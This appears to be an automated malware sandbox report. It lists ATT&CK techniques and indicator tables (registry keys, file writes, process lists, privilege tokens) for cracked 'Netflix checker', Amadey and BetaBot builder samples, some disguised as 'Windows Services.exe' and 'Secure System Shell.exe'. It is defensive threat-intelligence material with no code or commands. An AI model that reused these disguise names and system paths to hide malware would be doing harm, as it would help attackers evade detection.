File opened for modification	C:\Windows\IMF\Windows Services.exe	Launcher.exe
File created	C:\Windows\IMF\Secure System Shell.exe.tmp	Launcher.exe
File opened for modification	C:\Windows\IMF\Secure System Shell.exe	Launcher.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

4744 6008 WerFault.exe xnet.exe
2824 644 WerFault.exe xnet.exe

pid	pid_target	process	target process
4744	6008	WerFault.exe	xnet.exe
2824	644	WerFault.exe	xnet.exe

System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

litedb.exe7z2408-x64.exeWindows Services.exeNetflix GC Cracked.to.exesysBeta.exeLauncher.exeChecker Netflix.exepowershell.exeNetFlix GC Checker by xRisky.exeRuntime Explorer.exeLauncher.exepowershell.exeMultichecker 1.05.exeWScript.exeLauncher.exesecur32.exeGC.exeLauncher.exeNetflix by GOD Cracked By GM`ka.exepowershell.exelitedb.exeWScript.exepowershell.exeAmadey Cracked [XakFor.Net].exepowershell.exeprocs.exeMinecraft Generator By Zed.exexnet.exeMult-Cracked.exeLauncher.exeWScript.exeNetflix GC Cracked.to.exeSecure System Shell.exeMultichecker 1.05.exeNetflix GC Cracked.to.exesysMult.exeLauncher.exeNetFlix GC Checker by xRisky.exesvg.exeLauncher.exeProxy Generator 1.3.6 BETA.exeLauncher.exelib.exeUMT.exeLauncher.exeLauncher.exeGC.exeNetflix Checker v0.2.1.exeLauncher.exeGC.exeLauncher.exeBetaBotBuilderGUI.execombolist generator BY X-KILLER.exeLauncher.exexnet.exeLauncher.exeLauncher.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	litedb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7z2408-x64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows Services.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Netflix GC Cracked.to.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysBeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Checker Netflix.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetFlix GC Checker by xRisky.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Runtime Explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Multichecker 1.05.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	secur32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Netflix by GOD Cracked By GM`ka.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	litedb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Amadey Cracked [XakFor.Net].exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	procs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Minecraft Generator By Zed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xnet.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mult-Cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Netflix GC Cracked.to.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Secure System Shell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Multichecker 1.05.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Netflix GC Cracked.to.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysMult.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetFlix GC Checker by xRisky.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Proxy Generator 1.3.6 BETA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UMT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Netflix Checker v0.2.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BetaBotBuilderGUI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	combolist generator BY X-KILLER.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xnet.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 64 IoCs

Processes:

msedge.exelitedb.exelitedb.exe7z2408-x64.exeSaveSoft.exesvg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\3\0\1\MRUListEx = ffffffff	litedb.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\3\MRUListEx = 000000000200000001000000ffffffff	litedb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2408-x64.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	litedb.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	litedb.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings	SaveSoft.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	litedb.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	litedb.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	litedb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\SniffedFolderType = "Generic"	litedb.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	litedb.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	litedb.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg	litedb.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell	litedb.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	litedb.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 03000000000000000200000001000000ffffffff	litedb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	SaveSoft.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16	litedb.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\22\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	svg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"	7z2408-x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	SaveSoft.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	SaveSoft.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	litedb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	svg.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	SaveSoft.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	litedb.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	litedb.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	litedb.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	litedb.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\3\0\1	litedb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	litedb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\SniffedFolderType = "Generic"	litedb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip	7z2408-x64.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg	litedb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\22\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	svg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	SaveSoft.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	litedb.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\3\0\0\MRUListEx = ffffffff	litedb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\3\0\1	litedb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	litedb.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\22\ComDlg	svg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	litedb.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	litedb.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\3\0\0 = 8e00310000000000fc58925610004e4554464c497e310000760009000400efbe6359ed63635952642e00000063530400000028000000000000000000000000000000809698004e006500740066006c00690078002000470043002000470065006e0065007200610074006f00720020004200790020005300700061006300650058005600490049004900000018000000	litedb.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	svg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\22\Shell\SniffedFolderType = "Generic"	svg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip	7z2408-x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	litedb.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\3\MRUListEx = 020000000100000000000000ffffffff	svg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	litedb.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	SaveSoft.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 01000000030000000200000000000000ffffffff	SaveSoft.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	litedb.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	litedb.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\3\0	litedb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "6"	SaveSoft.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	litedb.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202	litedb.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\3\NodeSlot = "12"	litedb.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	litedb.exe

NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Unconfirmed 211662.crdownload:SmartScreen msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 211662.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exeLauncher.exepowershell.exeSaveSoft.exeWindows Services.exepowershell.exeSecure System Shell.exeLauncher.exe

pid	process
2184	msedge.exe
2184	msedge.exe
2544	msedge.exe
2544	msedge.exe
5108	msedge.exe
5108	msedge.exe
5376	identity_helper.exe
5376	identity_helper.exe
4372	msedge.exe
4372	msedge.exe
4372	msedge.exe
4372	msedge.exe
4680	msedge.exe
4680	msedge.exe
3732	msedge.exe
3732	msedge.exe
3356	Launcher.exe
3356	Launcher.exe
1040	powershell.exe
1040	powershell.exe
1040	powershell.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
5928	SaveSoft.exe
4464	Windows Services.exe
4464	Windows Services.exe
4464	Windows Services.exe
4464	Windows Services.exe
4464	Windows Services.exe
340	powershell.exe
340	powershell.exe
1260	Secure System Shell.exe
1260	Secure System Shell.exe
340	powershell.exe
4504	Launcher.exe

Suspicious behavior: GetForegroundWindowSpam 6 IoCs

Processes:

7zFM.exeSaveSoft.exelitedb.exeUMT.exesysBeta.exelitedb.exe

pid process

2192 7zFM.exe
5928 SaveSoft.exe
4192 litedb.exe
12908 UMT.exe
5728 sysBeta.exe
3984 litedb.exe

pid	process
2192	7zFM.exe
5928	SaveSoft.exe
4192	litedb.exe
12908	UMT.exe
5728	sysBeta.exe
3984	litedb.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 45 IoCs

Processes:

msedge.exe

pid	process
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe
2544	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exe7zFM.exeLauncher.exepowershell.exeWindows Services.exepowershell.exeSecure System Shell.exeLauncher.exexnet.exeLauncher.exeLauncher.exexnet.exeLauncher.exeLauncher.exelitedb.exe

description	pid	process
Token: SeRestorePrivilege	6056	7zFM.exe
Token: 35	6056	7zFM.exe
Token: SeSecurityPrivilege	6056	7zFM.exe
Token: SeRestorePrivilege	2192	7zFM.exe
Token: 35	2192	7zFM.exe
Token: SeSecurityPrivilege	2192	7zFM.exe
Token: SeDebugPrivilege	3356	Launcher.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	4464	Windows Services.exe
Token: SeIncreaseQuotaPrivilege	1040	powershell.exe
Token: SeSecurityPrivilege	1040	powershell.exe
Token: SeTakeOwnershipPrivilege	1040	powershell.exe
Token: SeLoadDriverPrivilege	1040	powershell.exe
Token: SeSystemProfilePrivilege	1040	powershell.exe
Token: SeSystemtimePrivilege	1040	powershell.exe
Token: SeProfSingleProcessPrivilege	1040	powershell.exe
Token: SeIncBasePriorityPrivilege	1040	powershell.exe
Token: SeCreatePagefilePrivilege	1040	powershell.exe
Token: SeBackupPrivilege	1040	powershell.exe
Token: SeRestorePrivilege	1040	powershell.exe
Token: SeShutdownPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeSystemEnvironmentPrivilege	1040	powershell.exe
Token: SeRemoteShutdownPrivilege	1040	powershell.exe
Token: SeUndockPrivilege	1040	powershell.exe
Token: SeManageVolumePrivilege	1040	powershell.exe
Token: 33	1040	powershell.exe
Token: 34	1040	powershell.exe
Token: 35	1040	powershell.exe
Token: 36	1040	powershell.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	1260	Secure System Shell.exe
Token: SeIncreaseQuotaPrivilege	340	powershell.exe
Token: SeSecurityPrivilege	340	powershell.exe
Token: SeTakeOwnershipPrivilege	340	powershell.exe
Token: SeLoadDriverPrivilege	340	powershell.exe
Token: SeSystemProfilePrivilege	340	powershell.exe
Token: SeSystemtimePrivilege	340	powershell.exe
Token: SeProfSingleProcessPrivilege	340	powershell.exe
Token: SeIncBasePriorityPrivilege	340	powershell.exe
Token: SeCreatePagefilePrivilege	340	powershell.exe
Token: SeBackupPrivilege	340	powershell.exe
Token: SeRestorePrivilege	340	powershell.exe
Token: SeShutdownPrivilege	340	powershell.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeSystemEnvironmentPrivilege	340	powershell.exe
Token: SeRemoteShutdownPrivilege	340	powershell.exe
Token: SeUndockPrivilege	340	powershell.exe
Token: SeManageVolumePrivilege	340	powershell.exe
Token: 33	340	powershell.exe
Token: 34	340	powershell.exe
Token: 35	340	powershell.exe
Token: 36	340	powershell.exe
Token: SeDebugPrivilege	4504	Launcher.exe
Token: SeDebugPrivilege	6008	xnet.exe
Token: SeDebugPrivilege	2516	Launcher.exe
Token: SeDebugPrivilege	568	Launcher.exe
Token: SeDebugPrivilege	644	xnet.exe
Token: SeDebugPrivilege	4852	Launcher.exe
Token: SeDebugPrivilege	5304	Launcher.exe
